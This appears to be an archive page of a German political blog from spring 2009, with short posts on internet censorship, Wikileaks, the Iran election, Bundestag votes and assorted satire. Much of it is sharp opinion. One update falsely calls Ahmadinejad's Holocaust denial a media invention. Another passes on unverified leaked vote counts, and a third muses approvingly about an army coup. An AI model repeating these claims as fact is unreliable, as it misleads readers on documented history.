Update: ist euch aufgefallen, dass sie sagt, "der Kampf um Meinungsfreiheit war immer berechtigt"? Ein Schelm, wer dabei böses denkt. Danke an Cryx für diesen Hinweis.

Sun Jun 21 2009

[l] Wikileaks klotzt mal wieder und verrät unter anderem die Anschrift des neuen MI5-Kontrollzentrums im Norden von London, dass die USA seit 13 Jahren eine Studie der Weltgesundheitsorganisation über Kokain zurück halten, ein internes Freimaurer-Buch, und die italienische (natürlich ebenfalls mit Kinderpornographie begründete) Internetzensurliste. Auf der sind laut Wikileaks tatsächlich hauptsächlich pornographie Seiten, aber hauptsächlich jugendpornographie, nicht kinderpornographie. Außerdem haben sie ein paar generische Webseiten gefunden, irgendwelche Webforen, wo vielleicht früher mal was verbotenes war, heute aber nicht mehr. Kann ja mal jemand durchgucken, wie viele davon in Europa und den USA gehostet werden und problemlos hätten gelöscht werden können…
Update: hat auch gleich jemand gemacht, und die Ergebnisse sind wenig überraschend.

Sat Jun 20 2009

[l] In Erfurt ticken die Uhren anders: "Polizei überfällt Landesbüro der Linkspartei in Erfurt". Der Anlass war eine Demonstration der Naziszene um die NPD herum gegen die Linken zum 17. Juni. Die haben die genau vor der Tür der Landesgeschäftsstelle der Linkspartei gemacht. Die hat dann mal ein paar Lautsprecher ins Fenster gestellt, um das wenigstens ein bisschen zu behindern. Daraufhin hat sich wohl die NPD bei der Polizei beschwert und die sollen dann ohne weitere Fragen rempelnd in das Büro der Linkspartei rein sein und wollten da rumstehende Jugendliche festnehmen und sich Zutritt zu den Abgeordnetenbüros verschaffen. (Danke, Florian)

Fri Jun 19 2009

[l] Mich weist gerade ein Ex-Bundeswehrler auf seinen Fahneneid hin:
"Ich schwöre (Wehrpflichtige: Ich gelobe), der Bundesrepublik Deutschland treu zu dienen und das Recht und die Freiheit des deutschen Volkes tapfer zu verteidigen, so wahr mir Gott helfe."
Man achte darauf, dass die nicht die Regierung sondern das Recht und die Freiheit des Volkes zu verteidigen geloben. Vielleicht wäre ein Bundeswehreinsatz im Inneren jetzt doch nicht so schlecht wie wir immer dachten. An der Zeit wäre es jedenfalls. Die Türkei hat vorgemacht, dass es sehr nützlich sein kann, wenn die Armee ab und zu mal die religiösen Fanatiker wegputscht. (Danke, Jens)

Thu Jun 18 2009

[l] Abgeordnetenwatch ist down. Die ganze Republik will sehen, wer für das Demokratie-Abschaff-Gesetz gestimmt hat. Das macht ein bisschen Hoffnung.
Aber ein paar der Zahlen müssen schon durchgerutscht sein irgendwo, hier twittert jemand, es habe 15 Enthaltungen bei den Grünen gegeben. Na mal schauen, das wird schon alles im Internet auftauchen. Und dann können wir gezielt den Leuten den Wahlkampf versauen, die dafür gestimmt haben.
Update: Bei der SPD sollen nur drei dagegen gestimmt haben: Steffen Reiche, Jörg Tauss, Wolfgang Wodarg. FDP und Linke waren wohl geschlossen dagegen.
Update: Ich hab mal ein Backup gemacht.
Update: Die Linkspartei hat das Abstimmungsverhalten als PDF veröffentlicht. Die größte Überraschung: einer aus der CDU hat dagegen gestimmt. Jochen Borchert. Bei der FDP hat der Herr Westerwelle gar nicht erst abgestimmt. Warum auch. Ist ja nicht so als wäre die Abschaffung der Gewaltenteilung seiner würdig als Thema. Bei den Linken haben auch nur so zwei Drittel abgestimmt. WTF? Aber hey, auch bei der CDU haben diverse Leute nicht mitgestimmt: Gauweiler, Michael Glos, der Guttenberg, Peter Hintze, die Merkel, Friedrich Merz und Schäuble. Die waschen also alle ihr Hände in Unschuld.

Wed Jun 17 2009

[l] Iran-Update: Immer noch Massenproteste, und die Regierung fährt härtere Bandagen auf:
Meanwhile, the prosecutor general of the central province of Isfahan warned that those behind post-election unrest could face the death penalty under Islamic law.
Die Begründung dafür ist, dass diese Leute offensichtlich aus dem Ausland kontrolliert werden!1!!
Und dann noch das folgende schockierende Detail:
There were unconfirmed reports that Mohammad Asgari, who was responsible for the security of the IT network in Iran's interior ministry, was killed yesterday in a suspicious car accident in Tehran. Asgari had reportedly leaked evidence that the elections were rigged to alter the votes from the provinces. Asgari was said to have leaked information that showed Mousavi had won almost 19m votes, and should therefore be president.
Und daher: seid lieb zu euren Hackern und Computerfreaks, denn sie retten im Zweifelsfall die Demokratie. Im Iran wie hier.
Oh übrigens: gegen Ende kommt dann noch dieser Absatz:
Iran's supreme leader, Ayatollah Ali Khamenei, last night appeared to rule out any change to the outcome of last week's poll by referring to Ahmadinejad as the "elected president". He dismissed the protests as the work of "tension seekers".
Damit hat er seine Karriere angreifbar gemacht. Auf der anderen Seite ist der Mann auf Lebenszeit gewählt im Iran, d.h. so richtig angreifen können sie ihn immer noch nicht.
Update: Hier gibt es eine beeindruckende Bildserie auf Flickr. Krass sind das viele Menschen! (Danke, Ron)
[l] Heute ist bei der Schwarzen Pest Kabarettabend, wie es ausschaut. Die haben noch eine Presseerklärung rausgehauen, wo sie die ganzen Pseudo-Konzessionen, die sie der Verräterpartei gegenüber gemacht haben, als die Früchte ihres Kampfes für den Datenschutz darzustellen versuchen. Das ist so unglaublich, das ich das durch große Kommentare nur verwässern würde. Ich zitiere daher mal großflächig:
Bei den Verhandlungen mit der SPD über das Gesetz zur Bekämpfung der Kinderpornographie in Kommunikationsnetzen wurden zentrale Forderungen der Union umgesetzt:
1. Durch die Sperrung der kinderpornographischen Seiten im Internet wird der Kampf gegen dieses Verbrechen um präventive Maßnahmen ergänzt. Zufällige Besuche auf diesen Seiten werden durch eine Stopp-Seite verhindert.
2. Nutzer, die z.B. durch Links in spam-mails auf diese Stopp-Seite gelangen, müssen nicht mit Strafverfolgung rechnen. Die Daten, die an der Stopp-Seite anfallen, dürfen für die Strafverfolgung nicht genutzt werden. Damit ist ein anderslautender Entwurf des SPD-geführten Justizministeriums vom Tisch.
3. Der Vorschlag von Bundesministerin von der Leyen, ein Expertengremium einzurichten, wurde realisiert: Der Datenschutzbeauftragte benennt fünf Mitglieder, die berechtigt sind, jederzeit die Sperrliste beim Bundeskriminalamt einzusehen und zu überprüfen.
4. Löschen geht vor Sperren: Wir bekämpfen das Übel an der Wurzel und werden nur dann sperren, wenn wir gegen die Inhalte nicht oder nicht zeitnah vorgehen können.
5. Wir haben klargestellt, dass Sperrmaßnahmen auf kinderpornographische Internet-Seiten beschränkt bleiben.
6. Nach zwei Jahren wird eine Evaluierung durch die Bundesregierung stattfinden. Ein Jahr später wird das Gesetz auf Grund der gewonnenen Erfahrungen optimiert werden. Das ist moderne Gesetzgebung, wenn man mit einer zukunftsfähigen Regelung Neuland betritt.
Insgesamt ist durch die massiven Nachbesserungen durch die Union ein ausgewogenes Gesetz entstanden, das energisches Vorgehen gegen die Kinderpornographie mit einem ausgeprägten Grundrechtsschutz verbindet.
Ein großer Erfolg für Bundesministerin von der Leyen!
Das waren ja alles Kernpunkte des Forderungenkatalogs der CDU, erinnert ihr euch da auch so klar dran wie ich gerade? Wenn die CDU unsere Daten nicht von den gifttriefenden Tentakeln der Verräterpartei gerettet hätte, …!1!!

Mon Jun 15 2009

[l] Die Informationsversorgung aus dem Iran ist gerade etwas schwierig zu beurteilen, daher reiche ich einfach mal alles weiter. Hier gibt es die angeblich echten Wahlergebnisse:
Unofficial news - reports leaked results from Interior Ministry:
Eligible voters: 49,322,412
Votes cast: 42,026,078
Spoilt votes: 38,716
Mir Hossein Mousavi: 19,075,623
Mehdi Karoubi: 13,387,104
Mahmoud Ahmadi-nejad (incumbent): 5,698,417
Mohsen Rezaei (conservative candidate): 3,754,218
Wow, das nenne ich mal eine Wahlbeteiligung, von der wir uns was abschneiden können. Vielleicht brauchen wir auch mal eine ordentliche Diktatur, die die Bürgerrechte abschafft. Oh, warte, … :-|
Und es gibt jetzt offenbar auch noch andere Quellen und Übersetzungen, die die Ungültigerklärung der Wahl bestätigen.
Das Problem mit diesen Meldungen ist, dass das auch alles ein PSYOP der Amis sein kann. Die haben ja erklärt, dass sie solche Operationen fahren würden, und die Wahl ist ja das offensichtliche Ziel dafür. Aber ich bin mal verhalten optimistisch und hoffe, dass der Iran in Zukunft tatsächlich von einem gemäßigten Präsidenten regiert wird, auch wenn die eigentliche Macht eh nicht beim Präsidenten sondern den Ayatollahs liegt.
Spannend ist auch, dass laut dieser Meldung selbst die Ayatollahs keinen Bock mehr auf Achmedinedschad haben.
Bei dailykos gibt es in einem Update weiter unten noch andere Zahlen für das "echte Wahlergebnis":
ballets cast - 37.4 million (81%)
Spoilt ballets - 600,000 (1.6%)
Mir Hossein Mousavi - 21.3 million (57.2%)
Mahmoud Ahmadinejad - 10.5 million (28%)
Mohsen Rezaei - 2.7 million (7.2%)
Mehdi Karrubi - 2.2 million (6%)
Das wäre auch ein dicker Verlust für Achmedinedschad. Man muss beim Iran wissen, dass der Khomeini gegen Verhütung und Abtreibung war und das hat eine Bevölkerungsexplosion bewirkt. Das Median-Alter im Iran ist 26 Jahre. Konservative sind ja vor allem ältere Bürger, in einem Land mit so vielen jungen Bürgern würde man an sich davon ausgehen, dass die eher progressiv wählen.
Update: Die BBC lässt das eher wie einen legitimen Wahlsieg von Achmedinedschad aussehen. Na mal schauen, was sich da noch ergibt.
Update: Also ich bin ja hin- und hergerissen. Meine Vermutung ist im Moment, dass der tatsächlich mit deutlicher Mehrheit wiedergewählt wurde. Denn seine Botschaft für das Land ist ja nicht doof. Überhaupt hat der so gut wie alles richtig gemacht. Das sieht man daran, dass unsere Medien ihm die Legende mit dem Holocaust-Leugnen andichten mußten. Wenn der tatsächlich Fehler gemacht hätten, hätten sie nicht so einen offensichtlichen Bullshit daher lügen müssen, um ihn zu diskreditieren. Seine Politik der Atomenergie ist auch sinnvoll, hätte ich an seiner Stelle genau so gemacht. Je weniger Öl die intern zum Stromerzeugen brauchen, desto mehr können sie exportieren, und das ist die Nummer-1 Einnahmequelle des Landes. Auch ansonsten tritt der da eher als Bauernsohn und Kandidat des armen Mannes auf, das ist nunmal die Mehrheit. Kurz gesagt: ich tendiere im Moment dazu, die Gerüchte für PSYOPs der Amis zu halten, die den da natürlich weg haben wollen, weil unter seiner Führung der Iran zur Hegemonialmacht der Gegend geworden ist. Das ist auch der Hauptgrund, wieso die Amis noch im Irak sind. Wenn die weggingen, würde der Iran sich das einverleiben. Nicht militärisch, sondern de facto. Die Saudis als Gegenpol in der Gegend haben seit Jahren abgewirtschaftet und überleben nur, weil die Amis da fette Militärbasen haben. Oh und zu den Straßenschlachten: das ist in den großen Städten, ~~die Mehrheit lebt auf dem Lande und sind Bauern, die sind eher pro Achmedinedschad~~. Update: Stimmt nicht, die Mehrheit sind die Städter. Danke an Hubert für den Hinweis.

Sat Jun 13 2009

[l] Mir wurden gerade ein paar lustige Bilder einer Studentenaktion anläßlich eines von-der-Leyen-Besuchs an der Uni Hannover zugeschickt. Der Einsender schreibt, dass die das Transparent von der Etage darüber aus runterhängen ließen, wo es auch den ganzen Abend über hängen blieb. Die Security war vom Studentenwerk und sahen angesichts des friedlichen Verhaltens der Demonstranten keinen Grund zum Eingreifen.
Die Ministerin sah sich dann wohl zu einer wütenden Gegenrede genötigt und schimpfte, die Studenten sollten ihre Energie lieber in die Bekämpfung von Kinderpornographie als in Proteste stecken (right back at you, Ursula, was hast du eigentlich die ersten drei Jahre deiner Amtszeit gegen Kinderpornographie unternommen?).
Kleiner Spaß am Rande:
Ich saß dabei noch mit älteren Herrschaften am Tisch, die uns zwar nicht unterstützen aber doch recht gemäßigt waren, und einer von denen (ein Jurist) meinte, die Botschaft sei nicht rüber gekommen und würde den Eindruck erwäcken, die Studenten wären dafür, einfach nichts zu tun. Natürlich hat er auch erzählt, dass damals, in den 70ern, zu seiner Zeit, wäre das ganz anders verlaufen etc.
Und im Grunde stimmt das ja. Weite Teile der Bosse heute haben bei den Studentenprotesten der 70er Jahre mitgemacht. Wir haben da viel Gemeinsamkeiten, die man nur mal aufarbeiten müsste, um diese Leute zu mobilisieren und auf unsere Seite zu bringen.
Update: Hier gibt es eine Transkript dessen, was sie da gesagt hat. Achtung: Spucktüten bereit halten! Sie hat sich nicht entblödet, da tatsächlich den CCC anzugreifen:
Die Bilder von Kindern, die vor laufender Kamera geschändet werden, wo vor laufender Kamera in Kauf genommen wird, dass diese Kinder an inneren Verletzungen verbluten [Ruf: Das ist doch widerlich!], das sind genau die Themen die unter "Kinderpornographie" laufen, wenn Sie Ihre Fachlichkeit, Ihre Fähigkeit als Chaos Computer Club im Internet einsetzen würden, um genau dieses zu verhindern [Ruf: Das tun wir.], dann wäre Ihr Engagement an der richtigen Stelle.
Und weiter unten:
Sie sind verantwortlich dafür, dass die Bilder von vergewaltigten Kindern [Ruf: Falsch.] [(weiter im Internet zugänglich bleiben?)] [Ruf: (Und Sie, dass sie versteckt werden.?)]
GENAU SO sieht das nämlich aus. Wir sind Schuld daran, dass diese Bilder im Internet sind und bleiben. Wer denn auch sonst. Sehr schön, dass sie das so klar geäußert hat.
Im Übrigen möchte ich mal darauf hinweisen, wie blank da die Nerven liegen, wenn sie sich davon so aus dem Konzept bringen lässt. Vor ein paar Tagen hieß es noch, alles sei in trockenen Tüchern und sie hätten sich alle geeinigt. (Danke, Sergej)
[l] Na? Schönes Wetter? Gute Laune? Zeit für ein paar Wirtschaftsmeldungen.
1. Städte wie Flint, Michigan sollen partiell plattgemacht und an die Natur zurück gegeben werden. Das war das Herz der US-Automobilindustrie, die jetzt insolvent ist, und dementsprechend entvölkern sich diese Städte langsam. Nur ziehen die Leute halt nicht straßenweise aus, sondern hier einer, dann da einer, und am Ende steht ein halbes Viertel leer, aber eben nicht am Stück, und das treibt die Unterhaltskosten in die Höhe. Daher sollen die noch lebenden Teile jetzt zusammengeführt werden, und den Rest wollen sie dann mit Bulldozern plattmachen und der Natur zurückgeben.
2. Die EU-Banken-Bailout-Verpflichtungen sind jetzt schon höher als das Deutsche Bruttoinlandsprodukt. Die Zahlen sind ja eh so groß, dass man dazu gar keinen Bezug mehr hat. Das Bruttoinlandsprodukt ist aber mal eine Größe, unter der man sich zumindest mal was vorstellen kann. Damit sollte wirklich jedem klar sein, in was für einer Größenordnung uns da gerade von unseren Regierungen Schulden aufgebrummt werden, die wir nie wieder werden abzahlen können.
3. Die US Bond Yields steigen. Klingt erst mal wie eine gute Nachricht, bis man das mal anders herum formuliert: das heißt, dass die Regierung höhere Zinsen versprechen muss, um überhaupt noch Käufer für ihre Schuldverschreibungen zu kriegen. Und das heißt im Umkehrschluß, dass die Regierung vorhat, bis zum Ablauf der Bonds die Inflation höher als den Yield der Schuldscheine zu halten. Denn das ist das Geschäftsmodell von Staatsanleihen.
Na, immer noch gute Laune?

Fri Jun 12 2009

[l] Aus der Reihe "wieso haben sie uns das eigentlich nicht im Geschichtsunterricht erzählt", heute: über den ersten Studenten, der in Deutschland von der Polizei ermordet wurde — Philipp Müller.
Am 11. Mai 1952 wurde in Essen bei einer großen Demonstration gegen die Remilitarisierung Westdeutschlands der FDJIer Philipp Müller erschossen. Er hatte - wie Benno Ohnesorg - von seinem Grundrecht auf freie Meinungsäußerung Gebrauch gemacht. Die Parallele liegt auf der Hand: Gestern schoß man auf FDJIer und verbot FDJ und KPD. Heute schießt man auf Studenten. Kaltschnäuzig fordert man das Verbot des SDS, durchschnüffelt seine Büros in Berlin und München und beschlagnahmt Organisationsmaterialien; unter der Westberliner Rufnummer des SDS meldet sich zeitweise bereits die Politische Polizei.
Das ist aus der Sicht des linken Jugendmagazins "elan" aus dem Jahre 1967, zum Tod Benno Ohnesorgs. Rückblickend ist es eine Schande, wie wenig wir im Geschichtsunterricht über die Nachkriegszeit informiert wurden. Das war alles nur Wirtschaftswunder, Aufschwung, die böse DDR baut die Mauer, Jubelperser-Geschichtsunterricht. Damals war das schlicht nicht Teil des Kurrikulums. Wer weiß, wahrscheinlich hätten die Lehrer da auch noch nicht genug Abstand dazu gehabt, um uns da mehr als die offizielle Verschwörungstheorie zu erzählen, die ja bei allen solchen Fällen gleich ist: eine verirrte Kugel (d.h. ein Unfall) oder ein irrer Einzeltäters. Dass ein Polizist, der einen Demonstranten erschießt, freigesprochen wird, das kann man ja auch mit ausreichend Abstand im Geschichtsunterricht nicht schönreden. Seufz.
Ich bin ja immer ein Anhänger der Sonnenlichttheorie. Wenn man solche Dinge im Verborgenen schmoren lässt, eitern sie. Da muss Sonnenlicht dran.

Wed Jun 10 2009

[l] Großartig: Eine homöopathische CD mit Energie-Heil-Mustern, die auch gut fürs Feng Shui ist. Ich bin ja nun gar kein Esoteriker, aber selbst ich merke, dass das gegen die angesprochenen Zielgruppentheorien verstößt. Auch die Computerprodukte am linken Rand sind … bemerkenswert. Tja, das ist halt das zweitälteste Gewerbe der Welt. Idioten von ihrem Geld trennen.
Update: Hier kriegt man Homöopathie-Energien auch ohne Wasser, durch auf Karten gemalte Symbole! Wie Zauberei! Oh warte, es ist Zauberei! :-)
Update: Noch ein Spontan-Klassiker: Mondstrahlen-Globuli.
zubereitet aus den Strahlungen des Herbstvollmondes am 7. 10. 1987
Milchzucker wird auf einem Glasteller den Strahlen des M ausgesetzt und dabei mit einem Glasstab umgerührt. Der so beladene Milchzucker wird in üblicher Weise dynamisiert (Fincke)
Könnte man auch selber machen, aber so einen guten Mond wie 1987 kriegen wir so schnell nicht wieder. (Danke, Holgi)

Sun Jun 7 2009

[l] Die erste gute Nachricht seit langem: ISP muss Vorratsdaten nicht an Contentmafia ausliefern. Das hat das OLG Frankfurt entschieden und damit eine einstweilige Verfügung des LG rückgängig gemacht.

Sat Jun 6 2009

[l] Lacher des Tages: Wiefelspütz kriegt alles raus, und weiß, was in Deutschland Sache ist :-)
Ich bin ja froh, dass wir den Wiefelspütz haben. Wenn der nicht immer wie ein Rhinozeros die Pläne der CDU-Mullahs verraten würde, wäre unsere Position deutich schwieriger zu vertreten. So betrachtet ist das echt "unser Mann in Berlin". Und weil er selber in der SPD ist, kann die CDU ihn auch nicht rausschmeißen, wenn er mal wieder alles kaputt gemacht hat durch eine unbedachte Äußerung. Wir sollten mal darüber nachdenken, dem einen GAGA-GOGO-TRALAFITTI-Orden zu verleihen. (Danke, Martin)

Sat May 30 2009

[l] Die Süddeutsche hat ein hervorragendes Interview mit Klaus Wagenbach gemacht, zu dessen Lektüre ich nur alle mit Nachdruck aufrufen kann. Wagenbach ist seit 1965 politischer Verleger und hat u.a. in Westberlin Bücher von Biermann publiziert. Weil er die Tötung Benno Ohnesorgs durch den Polizisten Karl-Heinz Kurras als "Mord" bezeichnet hat, wurde er 1975 zu neun Monaten Gefängnis verurteilt. Der Mann ist ein Held und was er zu sagen hat geht uns alle an.
Nirgendwo in der westlichen Welt war die kommunistische Partei verboten, nirgends, nur in Westdeutschland. Es ging einfach immer so weiter […].
Und dann wie sie ihn plattzumachen versucht haben:
Wagenbach: Die waren wild entschlossen, den Verlag zu vernichten.
SZ: Wer ist die?
Wagenbach: Die Berliner Polizei mit ihrem Präsidenten Klaus Hübner an der Spitze, die Berliner Justiz und die Berliner Presse. Wenn in den Springer-Zeitungen nach dem Staatsanwalt gerufen wurde, hatten wir maximal zwei Tage, aber er kam zuverlässig.
SZ: Wer kam?
Wagenbach: Die Polizei. Es kamen jedes Mal gleich sechzig bis achtzig Mann, für drei Räume.
SZ: Drei Räume und wie viele Mitarbeiter?
Wagenbach: Auch drei oder vier.
SZ: Gute Manndeckung.
(Danke, Burkhard)

Fri May 29 2009

[l] Die FDP reagiert verschnupft auf die Veröffentlichung der Fakten zur Performance ihrer Spitzenkandidatin im EU-Parlament. Die soll nämlich laut EU nur unter 45% der Sitzungen besucht haben. Die FDP soll dann Druck auf das EU-Parlament ausgeübt haben, damit die den Mutterschutz nicht als "nicht besucht" zählen, was die Zahlen auf 62% hoch geschönt hat.
Nun, 62%, das klingt für normale Leute wie Polizisten, Handwerker, Fleischwarenfachverkäuferinnen und Admins immer noch nach einem Haufen Zeit, 62% von einem Jahr sind immerhin 7 Monate. Nicht so bei Politikern, wie es scheint. Denn für EU-Politiker sind 62% nur 59 Tage. Ein komplettes Arbeitsjahr sind also nur 95 Tage. Ein Wunder, dass sich da noch keiner totgearbeitet hat!
Aber gut, 59 Tage, immerhin. Da lohnen sich doch die 15.000 Euro pro Monat, die diese Leute kassieren. Ein Schelm, wer da an den aktuellen FDP-Slogan denken muss.
Und 59 Tage sind ja auch ein Haufen Arbeit, nicht wahr?
Abgestimmt hat Koch-Mehrin laut EU-Parlament übrigens nur 22 mal. Was hat sie die restliche Zeit gemacht? Keine Ahnung? Wahrscheinlich Hintergrundpolitik gemacht.
Äh, wie meinen?
Die Rechtsanwälte von Koch-Mehrin sehen das anders. Gegenüber den Ruhrbaronen sagen sie, Koch-Mehrin habe viel öfter abgestimmt, dis würden die Abstimmungsprotokolle belegen. Aus dem Hintergrund ist auch hier zu hören, dass mehr Druck auf EU-Parlament ausgeübt werden soll, damit auch diese Zahlen nach oben korrigiert werden.
Nicht zu fassen.
Der eigentliche Lacher ist aber, wieso diese ganze Debatte jetzt geführt wird. Da hat nämlich ein Mitarbeiter im Euopäischen Parlament die Fehlzeiten zusammengerechnet, indem die Anwesenheitslisten ausgewertet wurden, in die sich die Abgeordneten eintragen müssen. Der Mitarbeiter kam dann sogar nur auf 39%.
Die FAZ hat darüber berichtet, und nicht nur das Detail mit dem Mutterschutz erwähnt, sondern auch die Abgeordnete zu Wort kommen lassen. Daraufhin hat die FAZ eine einstweilige Verfügung der über Landesgrenzen hinaus "bekannten" Pressekammer unter Richter Buske gefressen. Das ganze wird jetzt deshalb spannend, weil sie für die Klage eine eidesstattliche Erklärung abgegeben hat, in der sie behauptet hat, ihre Anwesenheit hätte über 70% betragen. Für eine falsche eidesstattliche Erklärung kann man drei Jahre in den Bau gehen.
Die Geschichte geht noch munter weiter. In dem Artikel heisst es noch, dass sie in einer Talkshow auf das Problem angesprochen wurde, und jetzt die Ausstrahlung der Talkshow per Anwalt zu verhindern versucht. Krass. Aber war ja bekannt, dass die FDP unwählbar ist.
Update: Guckt bei dem Link mit dem Motto nicht nur auf das Bild! Ich zitiere mal von dort:
Von der besagten Union stammt übrigens Daniel Caspary, der für die CDU im Europaparlament sitzt und via twitter folgendes zu seiner Parlamentskollegin Silvana Koch-Mehrin schrieb:
@ju_pforzheim #Koch-Mehrin fehlte dauernd: im Plenum nur 38%, im HaushaltsA keine 40% Anwesenheit. #FDP = Fehlen Dauernd im Parlament
Da weiß man, was man hat. Und in der Twittermeldung, auf die dieser CDU-Mensch geantwortet hat, heißt es gar:
@caspary ich hab gerade die BUDG-Protokolle durchgesehen, SKM hat nur an 25 v. 153 also 16,3% der BUDG-Sitzungen teilgenommen. #jg
BUDG ist das Budget Committee. SKM steht dann wohl auch für Silvana Koch-Mehrin.

Wed May 27 2009

[l] Der AK Zensur hat mal die Probe aufs Exempel gemacht und 60 kinderpornographische Internet-Angebote löschen lassen.
Jetzt machte Alvar Freude vom Arbeitskreis gegen Internet-Sperren und Zensur (AK Zensur) die Probe aufs Exempel, analysierte mit automatischen Verfahren die diversen europäischen Sperrlisten und schrieb die Provider an, auf deren Servern sich laut der Listen kinderpornographisches Material befinden soll. Mit beeindruckender Resonanz: Innerhalb der ersten 12 Stunden nach Aussenden der Mails wurden bereits 60 Webauftritte gelöscht.
Schon nach Minuten waren die ersten Seiten weg. Drei davon waren in Deutschland gehostet. Alvar Freude hat also innerhalb einem Tag mehr für den Kinderschutz in Deutschland getan als Frau von der Leyen und das BKA zusammen in vier Jahren.
Bei der überwiegenden Mehrheit der Webseiten, darunter einigen aus Deutschland, zeigte sich bei der Überprüfung durch den Provider, dass die Webseiten kein kinderpornographisches, teils überhaupt kein irgendwie beanstandbares Material enthielten - die Webauftritte waren folglich zu Unrecht gesperrt. In Finnland werden zudem auch mehrere inländische Webseiten blockiert, die sich kritisch mit den dortigen Internet-Sperren auseinandersetzen.
Das deckt sich ja genau mit den Erwartungen an die Zensurlisten. Keiner der Provider war informiert, dass er auf "Kinderporno"-Internetzensurlisten gelistet war.
Der interessante Punkt daran ist, dass es weniger Aufwand für das BKA wäre, dem jeweiligen Provider eine Email zu schreiben, als irgendwelche verschlüsselten URL-Listen an die ISPs rauszuschicken. Und dann wären die Seiten auch tatsächlich weg und nicht nur ein Schild davor gestellt.
[l] Hier gibt es die schriftlichen Stellungnahmen der Experten zur Zensursula. Die meisten anderen Blogs verweisen auf die Stellungnahme von Herrn Frey, aber ich möchte auch auf die des Herrn Bäcker hinweisen, die mir gerade echt gute Laune gemacht hat. So, meine Damen und Herren, sieht ein Totalschaden aus. Aus dem Wrack machen wir höchstens noch ein künstliches Korallenriff.
Oh übrigens, für Unterhaltungswert empfielt sich auch die BKA-Stellungnahme. Während der Zensor eine rauchen war, sind da so Aussagen durchgeschlüpft wie:
Alleine im vergangenen Jahr wurden im Rahmen dieser Arbeit drei Fälle in Deutschland aufgeklärt, damit eine Reihe von teils andauernden meist schweren sexuellen Missbrauchshandlungen zum Nachteil von Kindern durch deutsche Staatsangehörige im Ausland (sog. Kindersextourismus).
Drei? DREI?!? Im Kleingedruckten am oberen Seitenrand heißt es
Fehler! Verweisquelle konnte nicht gefunden werden.
Spezialexperten halt. Und der Lacher überhaupt ist auf Seite 7:
In Dänemark und Norwegen wird die Einschätzung des Bundeskriminalamtes geteilt, dass das World Wide Web den Einstieg für die Nutzung des Internet darstellt.
Der AK Zensur hat auch eine Stellungnahme geschrieben.
Update: Neuer Link.

Mon May 25 2009

[l] Nordkorea hat einen Atomtest gemacht, und die Russen beziffern ihn auf 10-20 Kilotonnen. Oh und Japan wird dann jetzt auch mal in Richtung Atommacht gehen, da könnt ihr mal einen drauf lassen.

Thu May 21 2009

[l] Ach gucke mal, hat MOGIS die dimap infratest Leute so effektiv lächerlich gemacht, dass die jetzt die MOGIS-Umfrage wieder aus dem Web genommen haben. SEHR schöne Aktion. Ich finde ja, MOGIS sollte jetzt auch das Geld zurückfordern.

Wed May 20 2009

[l] Die HSH-Nordbank hat sensible Kundendaten per Email an einen Pressefotographen geschickt. Die hätten eigentlich an die Deutsche Wertpapierservice-Bank gehen sollen, aber wie das so ist bei Emails, da kann man sich schon mal vertippen in der Domain.
Valdmanis wandte sich nach eigener Aussage bereits seit vergangenem Jahr mehrfach an Mitarbeiter der HSH Nordbank und informierte diese über die fehlgeleiteten Schreiben. Passiert sei nichts. Ein Mitarbeiter habe ihm gesagt, wenn die E-Mails nicht für ihn bestimmt seien, dürfe er sie nicht lesen.
Muhahahaha (Danke, Christoph)

Tue May 19 2009

[l] Hihihi, jemand hat Guido van Rossum ein Standardwerk für das Programmieren-Lernen gemailt. Ich war's nicht, aber es trifft meinen Geschmack voll und ganz :-)

Fri May 15 2009

[l] Microsoft verbietet memcpy. Was für eine unsäglich dämliche Idee. Meine Güte. strcpy und co haben sie schon verboten. Stattdessen soll man strcpy_s und memcpy_s benutzen.
Was für ein Schwachsinn. Nach memcpy kann man immerhin greppen. Wenn man das verbietet, werden einige Leute memcpy_s nehmen (und damit den Code unportabel machen), andere werden inline ein for-Schleife machen, oh und memcpy_s wirft übrigens eine Exception, wenn die Parameter falsch sind. Wenn man das nicht weiß, hat man aus dem nur potentiell ausnutzbaren Overflow einen garantierten Denial of Service gemacht. Tolle Wurst, Microsoft.

Tue May 12 2009

[l] OK, Leute, jetzt wird es ganz grob. Erinnert ihr euch an die lustige Sperrseite, über die wir uns im Februar alle gefreut haben? Hier hat jemand einen Screenshot gemacht, falls ihr euch nicht erinnert. Nun, die ist weg.
Warum?
Nun, das BMI hat sie sperren lassen.
Ist das zu fassen? Das BMI sperrt nicht nur wiederholt trotz mehrfacher direkter Aufforderung keine Kinderpornoseiten, aber eine Satireseite sperren sie?! Un-fass-bar! Ich bin ja nicht auf den Mund gefallen, aber da fehlen mir die richtigen Worte.
[l] Stalking und Einbrechen leicht gemacht — mit dem Iphone. (Danke, Norbert)

Sun May 10 2009

[l] Der Wiefelspütz ist wenigstens ehrlich: Wiefelspütz wird direkt gefragt, ob er sich genug mit dem Internet auskennt, um Begriffe wie "DNS" oder "TLD" erklären zu können. Die Antwort ist:
was soll denn ein "Computer" sein, was soll "Internet" sein?
Ich habe diese Begriffe noch nie gehört oder gelesen. Ich stamme nämlich aus dem vergangenen Jahrtausend.
DNS, TLD, GAGA, GOGO, TRALAFITTI oder was?
Wer jetzt glaubt, mit einer Nachfrage könnte man da Klärung herbei führen, wird hier eines Besseren belehrt.
Update: Da hat jemand einen coolen Lolcat-Wiefelspütz draus gemacht :-)

Thu May 7 2009

[l] Der Volkszustandsbericht hat für die Petition gegen Internetzensur ein Offline-Formular gemacht. Das faxt man dann am Ende dem Bundestag, die Nummer steht auf dem Formular. Ich weiß ja nicht, ob man Leute ohne Internet zum unterzeichnen der Petition bewegt kriegt, aber hey, einen Versuch ist es sicher wert :-)

Sat Apr 25 2009

[l] Kennt ihr den SQL Injection XKCD? Little Bobby Tables? Das hat jetzt mal jemand mit einem Firmennamen gemacht :-)
[l] Merck soll eine Liste mit zu neutralisierenden Ärzten intern rumgereicht haben. Wenn ihr wie ich da erst mal Pharmamafia assoziiert, und da auf voreilige Schlußfolgerungen kommt: nein, die sollten nicht ermordet werden, nur mundtot gemacht.
It is also alleged the company used intimidation tactics against critical researchers, including dropping hints it would stop funding to institutions and claims it interfered with academic appointments.
"We may need to seek them out and destroy them where they live," a Merck employee wrote, according to an email excerpt read to the court by Julian Burnside QC, acting for the plaintiff.
Und das Medikament, um das es ging, ist Vioxx, das Merck später vom Markt nehmen mußte, weil Patienten gehäuft verstarben.
Update: Ein besorgter Darmstädter schreibt mir gerade, dass man da zwischen Merck KGaA (Sitz in Deutschland, "die Guten") und Merck & Co Inc (USA, nach dem 1. Weltkrieg enteignete Tochter, heute ganz andere Firma, "die Bösen") unterscheiden muss, und der Mob mit den Mistgabeln zu letzterer gehen soll :-)

Thu Apr 23 2009

